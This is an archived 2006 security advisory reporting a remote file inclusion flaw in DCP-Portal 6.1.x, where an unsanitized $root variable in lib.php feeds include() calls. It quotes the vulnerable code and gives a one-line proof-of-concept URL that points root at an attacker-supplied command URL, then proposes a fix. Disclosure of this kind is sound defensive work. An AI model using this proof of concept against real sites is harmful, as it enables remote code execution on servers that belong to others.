AOH :: Web :: CMS / Portals

AOH :: Web :: CMS / Portals :: B06-2952.HTM
DCP-Portal 6.1.x, Remote command execution

DCP-Portal 6.1.x, Remote command execution DCP-Portal 6.1.x, Remote command execution


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -----------------------------------------------------
Advisory id: FSA:013

Author:    Federico Fazzi
Date:	   12/06/2006, 9:31
Sinthesis: DCP-Portal 6.1.x, Remote command execution
Type:	   high
Product: http://www.dcp-portal.org/ 
Patch:	   unavailable
- -----------------------------------------------------


1) Description:

Error occured in lib.php, line 4/7:

include ("$root/library/lib_nav.php");
include ("$root/library/lib_mods.php");
include ("$root/library/lib_admin.php");
include ("$root/library/lib_3rd.php");

variable $root not sanitized (declare).

2) Proof of concept:

http://example/[dp_path]/library/lib.php?root=[cmd_url] 

3) Solution:

declare $root variable on this file.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFEjRoI/yZYyBsK/94RAmqjAJ92aaKdht7NXZRO6ewWbhtWQI5w3QCfRYsL
rvFtJfviRWKAPRcoZfj0rSg=VXm6
-----END PGP SIGNATURE-----

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better). Site design & layout copyright © 1986-2009 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.